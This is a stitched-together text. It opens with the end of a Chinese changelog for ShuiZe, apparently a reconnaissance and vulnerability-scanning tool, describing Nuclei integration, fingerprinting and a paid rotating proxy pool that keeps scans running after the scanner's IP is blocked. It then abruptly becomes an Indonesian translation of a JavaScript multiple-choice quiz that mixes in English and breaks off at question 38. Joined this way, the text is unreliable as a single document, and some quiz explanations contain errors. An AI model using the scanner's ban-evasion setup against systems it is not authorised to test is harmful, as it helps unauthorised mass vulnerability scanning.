issues地址:https://github.com/0x727/ShuiZe_0x727/issues/74 感谢 **cwkiller** 反馈的问题 2022.4.16 增加了调用Nuclei检测漏洞 nuclei的参数在iniFile/config.ini配置,默认为`nuclei_config = -rl 300 -c 50 -timeout 5 -stats -silent -severity critical,high` 根据需求自行修改 ![](./imgs/nuclei_1.png) 2022.7.5 Nuclei默认参数配置增加-as issues地址: https://github.com/0x727/ShuiZe_0x727/issues/104 -as 参数,先使用 wappalyzer 进行指纹识别,在进行扫描。 感谢 **anquanbiji** 反馈的建议 2022.8.12 ShuiZe增加Dockerfile安装方式 issues地址: https://github.com/0x727/ShuiZe_0x727/issues/99 感谢 [@1itt1eB0y](https://github.com/1itt1eB0y) 提供的脚本。**安全性自行评估** 2022.8.12 修复了大量反馈aiqicha脚本报错的问题,初步排查是被封IP的原因。 2022.8.12 修复了quakeApi没有title导致报错的情况 issues地址: https://github.com/0x727/ShuiZe_0x727/issues/120 感谢 **Zimba5880** 反馈的建议 2022.8.20 增加了快代理配置,漏洞检测时会使用快代理的代理池,这样可以避免当前IP被封后导致后续的扫描出现遗漏。 购买快代理的隧道代理,地址:https://www.kuaidaili.com/cart?t=tps_c 根据自己的需求选择包年包月或者按量付费,更换IP的频率。这里注意并发请求数的,并发数量越高,在配置文件里iniFile/config.ini的thread_num就可以设置的更高。 假设并发数为5,那么thread_num不要设置超过10,具体的值自己测试。 ![](./imgs/kuaidaili1.png) 购买后查看host、port、username、password,然后填入到配置文件里 ![](./imgs/kuaidaili2.png) ![](./imgs/kuaidaili3.png) 默认关闭快代理代理池功能,如果要开启,把switch设置为on,使用快代理代理池时会先验证是否配置正确 ![](./imgs/kuaidaili4.png) 2022.8.27 集成了ObserverWard扫描指纹 项目地址:https://github.com/0x727/ObserverWard 指纹地址:https://github.com/0x727/FingerprintHub ![](./imgs/ObserverWard1.png) ## 0x08 反馈 ShuiZe(水泽) 是一个免费且开源的项目,我们欢迎任何人为其开发和进步贡献力量。 * 在使用过程中出现任何问题,可以通过 issues 来反馈。 * Bug 的修复可以直接提交 Pull Request 到 dev 分支。 * 如果是增加新的功能特性,请先创建一个 issue 并做简单描述以及大致的实现方法,提议被采纳后,就可以创建一个实现新特性的 Pull Request。 * 欢迎对说明文档做出改善,帮助更多的人使用 ShuiZe。 * 贡献代码请提交 PR 至 dev 分支,master 分支仅用于发布稳定可用版本。 *提醒:和项目相关的问题最好在 issues 中反馈,这样方便其他有类似问题的人可以快速查找解决方法,并且也避免了我们重复回答一些问题。* ## Stargazers over time [![Stargazers over time](https://starchart.cc/0x727/ShuiZe_0x727.svg)](https://starchart.cc/0x727/ShuiZe_0x727) <img align='right' src="https://profile-counter.glitch.me/ShuiZe_0x727/count.svg" width="200">
<h1>Pertanyaan JavaScript</h1> --- <span>Saya post pertanyaan pilihan ganda ke [Instagram](https://www.instagram.com/theavocoder) **stories** saya, yang saya post juga di sini ! update terakhir: <a href=#20191224><b>December 24th</b></a> Mulai tingkat dasar ke mahir: tes seberapa paham kamu tentang javascript, segarkan sedikit pengetahuan kamu, atau bersiap-siap untuk coding interview kamu! :muscle: :rocket: Saya update repo ini secara berkala dengan pertanyaan baru. Saya masukkan jawaban dibagian yang **tersembunyi** di bawah pertanyaan, cukup klik pada bagian itu untuk menampilkannya. Pertanyaan ini hanya untuk bersenang-senang, Semoga berhasil :heart:</span> Jangan sungkan untuk terhubung dengan saya! 😊 <br /> <a href="https://www.instagram.com/theavocoder">Instagram</a> || <a href="https://www.twitter.com/lydiahallie">Twitter</a> || <a href="https:/www.linkedin.com/in/lydia-hallie">LinkedIn</a> || <a href="www.lydiahallie.dev">Blog</a> </div> --- <details><summary><b> Lihat 20 Terjemahan yang tersedia 🇪🇸🇮🇹🇩🇪 🇫🇷🇷🇺🇨🇳🇵🇹🇽🇰</b></summary> <p> - [🇸🇦 العربية](../ar-AR/README_AR.md) - [🇪🇬 اللغة العامية](../ar-EG/README_ar-EG.md) - [🇧🇦 Bosanski](../bs-BS/README-bs_BS.md) - [🇩🇪 Deutsch](../de-DE/README.md) - [🇬🇧 English](../README.md) - [🇪🇸 Español](../es-ES/README-ES.md) - [🇫🇷 Français](../fr-FR/README_fr-FR.md) - [🇮🇹 Italiano](../it-IT/README.md) - [🇯🇵 日本語](../ja-JA/README-ja_JA.md) - [🇰🇷 한국어](../ko-KR/README-ko_KR.md) - [🇳🇱 Nederlands](../nl-NL/README.md) - [🇵🇱 Polski](../pl-PL/README.md) - [🇧🇷 Português Brasil](../pt-BR/README_pt_BR.md) - [🇷🇺 Русский](../ru-RU/README.md) - [🇽🇰 Shqip](../sq-KS/README_sq_KS.md) - [🇹🇭 ไทย](../th-TH/README-th_TH.md) - [🇹🇷 Türkçe](../tr-TR/README-tr_TR.md) - [🇺🇦 Українська мова](../uk-UA/README.md) - [🇻🇳 Tiếng Việt](../vi-VI/README-vi.md) - [🇨🇳 简体中文](../zh-CN/README-zh_CN.md) - [🇹🇼 繁體中文](../zh-TW/README_zh-TW.md) </p> </details> --- ###### 1. Apa yang akan tampil? ```javascript function sayHi() { console.log(name); console.log(age); var name = 'Lydia'; let age = 21; } sayHi(); ``` - A: `Lydia` dan `undefined` - B: `Lydia` dan `ReferenceError` - C: `ReferenceError` dan `21` - D: `undefined` dan `ReferenceError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D Di dalam function, kita membuat sebuah variabel `name` dan variabel tersebut di deklarasikan menggunakan `var`. Artinya variable tersebut di hoisting (dalam fase pembuatan ini menggunakan memory penyimpanan) dengan isi standar-nya `undefined`, saat javascript mengeksekusi baris code pembuatan variabel-nya. variabel `name` isinya masih undefined, jadi isi dari variabel tersebut `undefined` Mendeklarasikan varibel menggunakan `let` (dan `const`) juga terkena hoisting, tidak seperti `var`, variabel declaration `let` dan `const` tidak ditentukan isi standar-nya. `let` dan `const` tidak bisa diakses sebelum di tentukan dulu isi-nya. Kejadian ini disebut "temporal dead zone". Saat kita mencoba memanggil variabel yang belum ditentukan isi-nya, Javascript mengeluarkan error `ReferenceError`. </p> </details> --- ###### 2. Apa yang akan tampil? ```javascript for (var i = 0; i < 3; i++) { setTimeout(() => console.log(i), 1); } for (let i = 0; i < 3; i++) { setTimeout(() => console.log(i), 1); } ``` - A: `0 1 2` and `0 1 2` - B: `0 1 2` and `3 3 3` - C: `3 3 3` and `0 1 2` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Karena antrean peristiwa di JavaScript, fungsi callback `setTimeout` disebut _after_ loop telah dijalankan. Karena variabel `i` di loop pertama dideklarasikan menggunakan kata kunci` var`, nilai ini adalah global. Selama perulangan, kita menambah nilai `i` sebesar `1` setiap kali, menggunakan operator unary` ++ `. Pada saat fungsi callback `setTimeout` dipanggil,` i` sama dengan `3` di contoh pertama. Pada perulangan kedua, variabel `i` dideklarasikan menggunakan kata kunci` let`: variabel yang dideklarasikan dengan kata kunci `let` (dan` const`) memiliki cakupan blok (blok adalah apa saja di antara `{}`). Selama setiap iterasi, `i` akan memiliki nilai baru, dan setiap nilai dicakup di dalam loop. </p> </details> --- ###### 3. Apa yang akan tampil? ```javascript const shape = { radius: 10, diameter() { return this.radius * 2; }, perimeter: () => 2 * Math.PI * this.radius, }; console.log(shape.diameter()); console.log(shape.perimeter()); ``` - A: `20` dan `62.83185307179586` - B: `20` dan `NaN` - C: `20` dan `63` - D: `NaN` dan `63` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B Perhatikan pada nilai 'diameter' adalah fungsi biasa, sedangkan nilai 'perimeter' yaitu fungsi panah. Dengan fungsi panah, kata kunci 'this' merujuk ke cakupan sekitarnya saat ini, tidak seperti fungsi biasa. Ini berarti bahwa ketika kita memanggil 'perimeter' itu tidak mengacu pada objek bentuk, tetapi pada lingkup sekitarnya. Tidak ada nilai 'radius' pada objek itu, yang mengembalikan 'tidak ditentukan'. </p> </details> --- ###### 4. Apa yang akan tampil? ```javascript +true; !'Lydia'; ``` - A: `1` dan `false` - B: `false` dan `NaN` - C: `false` dan `false` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Tia unary plus mencoba mengonversi operan menjadi angka. `true` adalah` 1`, dan `false` adalah` 0`. String "'Lydia'` adalah nilai yang benar. Apa yang sebenarnya kami tanyakan adalah "apakah nilai kebenaran ini salah?". Ini mengembalikan `salah`. </p> </details> --- ###### 5. Mana yang benar? ```javascript const bird = { size: 'small', }; const mouse = { name: 'Mickey', small: true, }; ``` - A: `mouse.bird.size` tidak benar - B: `mouse[bird.size]` tidak benar - C: `mouse[bird["size"]]` tidak benar - D: Semua jawaban benar <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Pada JavaScript, semua kunci objek adalah string (kecuali jika itu berupa Simbol). Meskipun kita mungkin tidak mengetiknya sebagai string, tetap saja mereka selalu berubah menjadi string didalamnya. JavaScript menginterpretasikan (atau membuka) pernyataan-pernyataan. Saat kita menggunakan notasi kurung siku, ia melihat kurung buka pertama `[` dan terus berjalan sampai menemukan kurung tutup `]`. Baru setelah itu akan mengevaluasi pernyataannya. `mouse[bird.size]`: Pertama, ini mengevaluasi `bird.size`, yang mana `"small"`. `mouse["small"]` mengembalikan nilai `true`. Namun, dengan notasi dot (.), hal ini tidak terjadi. `mouse` tidak memiliki kunci dengan nama `bird`, yang menyebabkan `mouse.bird` bernilai `undefined`. Kemudian, kita meminta `size` untuk menggunakan notasi dot (.): `mouse.bird.size`. Kita mengetahui bahwa `mouse.bird` bernilai `undefined`, yang sebenarnya kita minta adalah `undefined.size`. Yang mana hal ini tidak valid, dan akan memunculkan kesalahan yang mirip dengan `Cannot read property "size" of undefined`. </p> </details> --- ###### 6. Apa yang akan tampil? ```javascript let c = { greeting: 'Hey!' }; let d; d = c; c.greeting = 'Hello'; console.log(d.greeting); ``` - A: `Hello` - B: `Hey!` - C: `undefined` - D: `ReferenceError` - E: `TypeError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Dalam JavaScript, semua objek berinteraksi dengan _reference_ saat menyetelnya agar sama satu sama lain. Pertama, variabel `c` menyimpan nilai ke sebuah objek. Nanti, kita menetapkan `d` dengan referensi yang sama yang dimiliki` c` ke objek. <img src="https://i.imgur.com/ko5k0fs.png" width="200"> Saat Anda mengubah satu objek, Anda mengubah semuanya. </p> </details> --- ###### 7. Apa yang akan tampil? ```javascript let a = 3; let b = new Number(3); let c = 3; console.log(a == b); console.log(a === b); console.log(b === c); ``` - A: `true` `false` `true` - B: `false` `false` `true` - C: `true` `false` `false` - D: `false` `true` `true` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C `new Number()` adalah konstruktor fungsi bawaan pada JavaScript. Meskipun hasilnya terlihat seperti integer, namun sebenarnya itu bukan integer: aslinya memiliki banyak fitur tambahan dan merupakan sebuah objek. Saat kita menggunakan operator `==`, hal ini hanya akan memeriksa bahwa keduanya memiliki nilai yang sama. Pada kasus ini kedua variabel tersebut memiliki nilai yang sama, yaitu `3`, maka akan mengembalikan nilai `true`. Namun, saat kita menggunakan operator `===`, operator ini memeriksa bahwa kedua variabel memiliki nilai dan tipe yang sama. Bagaimanapun: `new Number()` bukanlah sebuah integer, ini adalah sebuah **object**. Keduanya akan mengembalikan nilai `false.` </p> </details> --- ###### 8. Apa yang akan tampil? ```javascript class Chameleon { static colorChange(newColor) { this.newColor = newColor; return this.newColor; } constructor({ newColor = 'green' } = {}) { this.newColor = newColor; } } const freddie = new Chameleon({ newColor: 'purple' }); console.log(freddie.colorChange('orange')); ``` - A: `orange` - B: `purple` - C: `green` - D: `TypeError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D Fungsi `colorChange` adalah statis. Metode statis dirancang hanya dapat aktif pada kontruktor dimana fungsi itu dibuat, dan tidak bisa dibawa ke-turunannya. Kita tahu bahwa `freddie` adalah sebuah turunan, maka fungsi itu tidak bisa turun, dan tidak tersedia pada instance `freddie`: sebuah pesan `TypeError` akan dikembalikan </p> </details> --- ###### 9. Apa yang akan tampil? ```javascript let greeting; greetign = {}; // Typo! console.log(greetign); ``` - A: `{}` - B: `ReferenceError: greetign is not defined` - C: `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Ini mencatat objek, karena kita baru saja membuat objek kosong di objek global! Saat kita salah mengetik `greeting` sebagai` greetign`, interpreter JS sebenarnya melihat ini sebagai `global.greetign = {}` (atau `window.greetign = {}` di browser). Untuk menghindari hal ini, kita bisa menggunakan `" use strict "`. Ini memastikan bahwa Anda telah mendeklarasikan variabel sebelum menetapkannya dengan apa pun. </p> </details> --- ###### 10. Apa yang terjadi jika kita melakukan ini? ```javascript function bark() { console.log('Woof!'); } bark.animal = 'dog'; ``` - A: Nothing, this is totally fine! - B: `SyntaxError`. You cannot add properties to a function this way. - C: `"Woof"` gets logged. - D: `ReferenceError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Ini dimungkinkan dalam JavaScript, karena fungsi adalah objek! (Segala sesuatu selain tipe primitif adalah objek) Fungsi adalah jenis objek khusus. Kode yang Anda tulis sendiri bukanlah fungsi sebenarnya. Fungsinya adalah objek dengan properti. Properti ini tidak dapat dipanggil. </p> </details> --- ###### 11. Apa yang akan tampil? ```javascript function Person(firstName, lastName) { this.firstName = firstName; this.lastName = lastName; } const member = new Person('Lydia', 'Hallie'); Person.getFullName = function() { return `${this.firstName} ${this.lastName}`; }; console.log(member.getFullName()); ``` - A: `TypeError` - B: `SyntaxError` - C: `Lydia Hallie` - D: `undefined` `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Anda tidak dapat menambahkan properti ke constructor seperti yang Anda lakukan dengan objek biasa. Jika Anda ingin menambahkan fitur ke semua objek sekaligus, Anda harus menggunakan prototipe sebagai gantinya. Jadi dalam kasus ini: ```js Person.prototype.getFullName = function() { return `${this.firstName} ${this.lastName}`; }; ``` Akan membuat `member.getFullName()` berfungsi. Mengapa ini bermanfaat? Katakanlah kita menambahkan metode ini ke konstruktor itu sendiri. Mungkin tidak setiap instance `Person` membutuhkan metode ini. Ini akan membuang banyak ruang memori, karena mereka masih memiliki properti itu, yang mengambil ruang memori untuk setiap instance. Sebaliknya, jika kita hanya menambahkannya ke prototipe, kita hanya memilikinya di satu tempat di memori, namun mereka semua memiliki akses ke sana! </p> </details> --- ###### 12. Apa yang akan tampil? ```javascript function Person(firstName, lastName) { this.firstName = firstName; this.lastName = lastName; } const lydia = new Person('Lydia', 'Hallie'); const sarah = Person('Sarah', 'Smith'); console.log(lydia); console.log(sarah); ``` - A: `Person {firstName: "Lydia", lastName: "Hallie"}` dan `undefined` - B: `Person {firstName: "Lydia", lastName: "Hallie"}` dan `Person {firstName: "Sarah", lastName: "Smith"}` - C: `Person {firstName: "Lydia", lastName: "Hallie"}` dan `{}` - D:`Person {firstName: "Lydia", lastName: "Hallie"}` dan `ReferenceError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Pada `sarah`, kita tidak menggunakan kata kunci `new`. Saat menggunakan `new`, Ini mengacu pada object kosong yang kita buat. Namun, jika Anda tidak menambahkan `new` ini merujuk pada **global object**! Kita tahu bahwa `this.firstName` setara dengan `"Sarah"` dan `this.lastName` sama dengan `"Smith"`. Apa yang sebenarnya kami lakukan adalah mendefinisikan `global.firstName = 'Sarah'` dan `global.lastName = 'Smith'`. `sarah` sendiri dibiarkan `undefined`, karena kita tidak mengembalikan nilai dari fungsi `Person`. </p> </details> --- ###### 13. Apa tiga fase dari event propagation? - A: Target > Capturing > Bubbling - B: Bubbling > Target > Capturing - C: Target > Bubbling > Capturing - D: Capturing > Target > Bubbling <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D Selama fase **capturing**, event melewati elemen ancestor hingga ke elemen target. Kemudian mencapai element **target**, dan **bubbling** dimulai. <img src="https://i.imgur.com/N18oRgd.png" width="200"> </p> </details> --- ###### 14. Semua objek memiliki prototypes. - A: true - B: false <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B Semua objek memiliki prototypes, kecuali **objek dasar**. Objek dasar adalah objek yang dibuat oleh pengguna, atau objek yang dibuat dengan menggunakan kata kunci `baru`. Objek dasar memiliki akses ke beberapa metode dan properti, seperti `.toString`. Inilah alasan mengapa Anda dapat menggunakan metode JavaScript bawaan! Semua metode tersebut tersedia di prototipe. Meskipun JavaScript tidak dapat menemukannya secara langsung di objek Anda, JavaScript berada di rantai prototipe dan menemukannya di sana, yang membuatnya dapat diakses untuk Anda. </p> </details> --- ###### 15. Apa yang akan tampil? ```javascript function sum(a, b) { return a + b; } sum(1, '2'); ``` - A: `NaN` - B: `TypeError` - C: `"12"` - D: `3` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C JavaScript adalah **Bahasa yang bersifat dinamis**: yang tidak menentukan jenis variabel tertentu. Values dapat secara otomatis diubah menjadi jenis lain tanpa Anda sadari, yang disebut _implicit type coercion_. **Coercion** adalah mengubah dari satu jenis ke jenis lainnya. Pada contoh ini, JavaScript mengubah number `1` menjadi sebuah string, agar fungsi tersebut masuk akal dan mengembalikan nilai. Selama penambahan tipe numerik (`1`) dan tipe string (`'2'`), angka tersebut diperlakukan sebagai string. Kita bisa menggabungkan string seperti `"Hello" + "World"`, jadi yang terjadi di sini adalah `"1" + "2"` yang mengembalikan `"12"`. </p> </details> --- ###### 16. Apa yang akan tampil? ```javascript let number = 0; console.log(number++); console.log(++number); console.log(number); ``` - A: `1` `1` `2` - B: `1` `2` `2` - C: `0` `2` `2` - D: `0` `1` `2` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C **Akhiran** operator unary `++`: 1. Mengembalikan nilai (ini mengembalikan `0`) 2. Menambahkan nilai (angkanya sekarang `1`) **Awalan** operator unary `++`: 1. Menambah nilai (angkanya sekarang `2`) 2. Mengembalikan nilai (ini mengembalikan `2`) Ini mengembalikan `0 2 2`. </p> </details> --- ###### 17. Apa yang akan tampil? ```javascript function getPersonInfo(one, two, three) { console.log(one); console.log(two); console.log(three); } const person = 'Lydia'; const age = 21; getPersonInfo`${person} is ${age} years old`; ``` - A: `"Lydia"` `21` `["", " is ", " years old"]` - B: `["", " is ", " years old"]` `"Lydia"` `21` - C: `"Lydia"` `["", " is ", " years old"]` `21` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B Jika Anda menggunakan literal template yang diberi tag, nilai argumen pertama selalu berupa array bernilai string. Argumen yang tersisa mendapatkan nilai dari ekspresi yang diteruskan! </p> </details> --- ###### 18. Apa yang akan tampil? ```javascript function checkAge(data) { if (data === { age: 18 }) { console.log('You are an adult!'); } else if (data == { age: 18 }) { console.log('You are still an adult.'); } else { console.log(`Hmm.. You don't have an age I guess`); } } checkAge({ age: 18 }); ``` - A: `You are an adult!` - B: `You are still an adult.` - C: `Hmm.. You don't have an age I guess` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Saat menguji persamaan, primitif dibandingkan dengan nilainya, sedangkan objek dibandingkan dengan referensinya. JavaScript memeriksa apakah objek memiliki referensi ke lokasi yang sama di memori. Dua objek yang kita bandingkan tidak memiliki itu: objek yang kita lewati sebagai parameter merujuk ke lokasi yang berbeda dalam memori dari objek yang kita gunakan untuk memeriksa persamaan. Inilah mengapa `{age: 18} === {age: 18}` dan `{age: 18} == {age: 18}` mengembalikan nilai `false`. </p> </details> --- ###### 19. Apa yang akan tampil? ```javascript function getAge(...args) { console.log(typeof args); } getAge(21); ``` - A: `"number"` - B: `"array"` - C: `"object"` - D: `"NaN"` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Parameter sisanya (`... args`.) Memungkinkan kita "mengumpulkan" semua argumen yang tersisa ke dalam sebuah array. Array adalah sebuah objek, jadi `typeof args` mengembalikan "objek" </p> </details> --- ###### 20. Apa yang akan tampil? ```javascript function getAge() { 'use strict'; age = 21; console.log(age); } getAge(); ``` - A: `21` - B: `undefined` - C: `ReferenceError` - D: `TypeError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Dengan `" use strict "`, Anda dapat memastikan bahwa Anda tidak mendeklarasikan variabel global secara tidak sengaja. Kita tidak pernah mendeklarasikan variabel `age`, dan karena kita menggunakan `" use strict "`, ini akan memunculkan kesalahan referensi. Jika kita tidak menggunakan `" use strict "`, ini akan berhasil, karena properti `age` akan ditambahkan ke objek global. </p> </details> --- ###### 21. What's value of `sum`? ```javascript const sum = eval('10*10+5'); ``` - A: `105` - B: `"105"` - C: `TypeError` - D: `"10*10+5"` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A `eval` mengevaluasi kode yang berlalu sebagai string. Jika itu adalah ekspresi, seperti dalam kasus ini, itu mengevaluasi ekspresi. Ungkapannya adalah `10 * 10 + 5`. Ini kembali nomor `105`. </p> </details> --- ###### 22. Sampai berapa lama kah cool_secret dapat diakses? ```javascript sessionStorage.setItem('cool_secret', 123); ``` - A: Selamanya, data tersebut tidak akan hilang. - B: Saat pengguna menutup tab browser. - C: Saat pengguna menutup seluruh browser, tidak hanya tab. - D: Saat pengguna mematikan komputernya. <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B Data yang disimpan di `sessionStorage` akan dihapus setelah menutup _tab_. Jika anda menggunakan `localStorage`, data tersebut akan tersimpan selamanya, kecuali misalnya _method_ `localStorage.clear()` dipanggil. </p> </details> --- ###### 23. Apa yang akan tampil? ```javascript var num = 8; var num = 10; console.log(num); ``` - A: `8` - B: `10` - C: `SyntaxError` - D: `ReferenceError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B Dengan kata kunci `var`, anda dapat menyatakan beberapa variabel dengan nama yang sama. Variabelnya akan memegang nilai terakhir. Anda tidak dapat melakukan ini dengan `let` atau `const` karena mereka block-scoped. </p> </details> --- ###### 24. Apa yang akan tampil? ```javascript const obj = { 1: 'a', 2: 'b', 3: 'c' }; const set = new Set([1, 2, 3, 4, 5]); obj.hasOwnProperty('1'); obj.hasOwnProperty(1); set.has('1'); set.has(1); ``` - A: `false` `true` `false` `true` - B: `false` `true` `true` `true` - C: `true` `true` `false` `true` - D: `true` `true` `true` `true` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C All object keys (excluding Symbols) are strings under the hood, even if you don't type it yourself as a string. This is why `obj.hasOwnProperty('1')` also returns true. It doesn't work that way for a set. There is no `'1'` in our set: `set.has('1')` returns `false`. It has the numeric type `1`, `set.has(1)` returns `true`. </p> </details> --- ###### 25. Apa yang akan tampil? ```javascript const obj = { a: 'one', b: 'two', a: 'three' }; console.log(obj); ``` - A: `{ a: "one", b: "two" }` - B: `{ b: "two", a: "three" }` - C: `{ a: "three", b: "two" }` - D: `SyntaxError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Jika anda memiliki dua kunci dengan nama yang sama, kunci akan diganti. Ini masih dalam posisi pertama, tetapi dengan nilai terakhir yang ditentukan. </p> </details> --- ###### 26. The JavaScript global execution context creates two things for you: the global object, and the "this" keyword. - A: true - B: false - C: it depends <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A The base execution context is the global execution context: it's what's accessible everywhere in your code. </p> </details> --- ###### 27. Apa yang akan tampil? ```javascript for (let i = 1; i < 5; i++) { if (i === 3) continue; console.log(i); } ``` - A: `1` `2` - B: `1` `2` `3` - C: `1` `2` `4` - D: `1` `3` `4` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Pernyataan `continue` melewatkan iterasi jika kondisi tertentu mengembalikan `true`. </p> </details> --- ###### 28. Apa yang akan tampil? ```javascript String.prototype.giveLydiaPizza = () => { return 'Just give Lydia pizza already!'; }; const name = 'Lydia'; console.log(name.giveLydiaPizza()) ``` - A: `"Just give Lydia pizza already!"` - B: `TypeError: not a function` - C: `SyntaxError` - D: `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A `String` adalah konstruksi dibangun, yang dapat kita tambahkan properti ke. Aku hanya menambahkan metode ke prototipe. String primitif string secara otomatis dikonversi menjadi objek string, dihasilkan oleh fungsi prototipe string. Jadi, semua string (objek string) memiliki akses ke metode itu! </p> </details> --- ###### 29. Apa yang akan tampil? ```javascript const a = {}; const b = { key: 'b' }; const c = { key: 'c' }; a[b] = 123; a[c] = 456; console.log(a[b]); ``` - A: `123` - B: `456` - C: `undefined` - D: `ReferenceError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B Object keys are automatically converted into strings. We are trying to set an object as a key to object `a`, with the value of `123`. However, when we stringify an object, it becomes `"[object Object]"`. So what we are saying here, is that `a["object Object"] = 123`. Then, we can try to do the same again. `c` is another object that we are implicitly stringifying. So then, `a["object Object"] = 456`. Then, we log `a[b]`, which is actually `a["object Object"]`. We just set that to `456`, so it returns `456`. </p> </details> --- ###### 30. Apa yang akan tampil? ```javascript const foo = () => console.log('First'); const bar = () => setTimeout(() => console.log('Second')); const baz = () => console.log('Third'); bar(); foo(); baz(); ``` - A: `First` `Second` `Third` - B: `First` `Third` `Second` - C: `Second` `First` `Third` - D: `Second` `Third` `First` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B Kami memiliki fungsi `setTimeout` dan dimohonkan terlebih dahulu. Namun, itu login terakhir. Hal ini karena di browsers, kita tidak hanya memiliki mesin waktu runtime, kita juga memiliki sesuatu yang disebut `WebAPI`. `WebAPI` memberi kita fungsi `setTimeout`, dan misalnya DOM. Setelah _callback_ (panggilan balik) didorong ke WebAPI, fungsi `setTimeout` itu sendiri (tetapi tidak panggilan balik) muncul dari tumpukan. <img src="https://i.imgur.com/X5wsHOg.png" width="200"> Sekarang, `foo` mendapat hambatan, dan `"First"` yang login. <img src="https://i.imgur.com/Pvc0dGq.png" width="200"> `foo` yang muncul dari tumpukan, dan `baz` mendapat perantara. `"Third"` akan login. <img src="https://i.imgur.com/WhA2bCP.png" width="200"> WebAPI tidak bisa hanya menambahkan barang-barang ke tumpukan setiap kali siap. Sebaliknya, ia mendorong fungsi panggilan balik ke sesuatu yang disebut _queue_ (antrian). <img src="https://i.imgur.com/NSnDZmU.png" width="200"> Di sinilah serangkaian acara mulai bekerja. Sebuah **event loop** (putaran kejadian/peristiwa) melihat tumpukan dan antrian tugas. Jika tumpukan kosong, itu mengambil hal pertama pada antrian dan mendorong ke tumpukan. <img src="https://i.imgur.com/uyiScAI.png" width="200"> `bar` bisa dipanggil, `"Second"` akan login, dan itu muncul dari tumpukan. </p> </details> --- ###### 31. What is the event.target when clicking the button? ```html <div onclick="console.log('first div')"> <div onclick="console.log('second div')"> <button onclick="console.log('button')"> Click! </button> </div> </div> ``` - A: Outer `div` - B: Inner `div` - C: `button` - D: An array of all nested elements. <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C The deepest nested element that caused the event is the target of the event. You can stop bubbling by `event.stopPropagation` </p> </details> --- ###### 32. When you click the paragraph, what's the logged output? ```html <div onclick="console.log('div')"> <p onclick="console.log('p')"> Click here! </p> </div> ``` - A: `p` `div` - B: `div` `p` - C: `p` - D: `div` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A If we click `p`, we see two logs: `p` and `div`. During event propagation, there are 3 phases: capturing, target, and bubbling. By default, event handlers are executed in the bubbling phase (unless you set `useCapture` to `true`). It goes from the deepest nested element outwards. </p> </details> --- ###### 33. Apa yang akan tampil? ```javascript const person = { name: 'Lydia' }; function sayHi(age) { return `${this.name} is ${age}`; } console.log(sayHi.call(person, 21)); console.log(sayHi.bind(person, 21)); ``` - A: `undefined is 21` `Lydia is 21` - B: `function` `function` - C: `Lydia is 21` `Lydia is 21` - D: `Lydia is 21` `function` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D With both, we can pass the object to which we want the `this` keyword to refer to. However, `.call` is also _executed immediately_! `.bind.` returns a _copy_ of the function, but with a bound context! It is not executed immediately. </p> </details> --- ###### 34. Apa yang akan tampil? ```javascript function sayHi() { return (() => 0)(); } console.log(typeof sayHi()); ``` - A: `"object"` - B: `"number"` - C: `"function"` - D: `"undefined"` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B The `sayHi` function returns the returned value of the immediately invoked function (IIFE). This function returned `0`, which is type `"number"`. FYI: there are only 7 built-in types: `null`, `undefined`, `boolean`, `number`, `string`, `object`, `symbol`, and `bigint`. `"function"` is not a type, since functions are objects, it's of type `"object"`. </p> </details> --- ###### 35. Which of these values are falsy? ```javascript 0; new Number(0); (''); (' '); new Boolean(false); undefined; ``` - A: `0`, `''`, `undefined` - B: `0`, `new Number(0)`, `''`, `new Boolean(false)`, `undefined` - C: `0`, `''`, `new Boolean(false)`, `undefined` - D: All of them are falsy <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Hanya ada enam nilai yang salah: - `undefined` - `null` - `NaN` - `0` - `''` (string kosong) - `false` Konstruktor fungsi, seperti Number baru dan Boolean baru, benar. </p> </details> --- ###### 36. Apa yang akan tampil? ```javascript console.log(typeof typeof 1); ``` - A: `"number"` - B: `"string"` - C: `"object"` - D: `"undefined"` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B `typeof 1` returns `"number"`. `typeof "number"` returns `"string"` </p> </details> --- ###### 37. Apa yang akan tampil? ```javascript const numbers = [1, 2, 3]; numbers[10] = 11; console.log(numbers); ``` - A: `[1, 2, 3, 7 x null, 11]` - B: `[1, 2, 3, 11]` - C: `[1, 2, 3, 7 x empty, 11]` - D: `SyntaxError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Saat Anda menyetel nilai ke elemen dalam larik yang melebihi panjang larik, JavaScript membuat sesuatu yang disebut "slot kosong". Ini sebenarnya memiliki nilai `tidak terdefinisi`, tetapi Anda akan melihat sesuatu seperti: `[1, 2, 3, 7 x empty, 11]` tergantung di mana Anda menjalankannya (berbeda untuk setiap browser, node, dll.) </p> </details> --- ###### 38. Apa yang akan tampil? ```javascript (() => { let x, y; 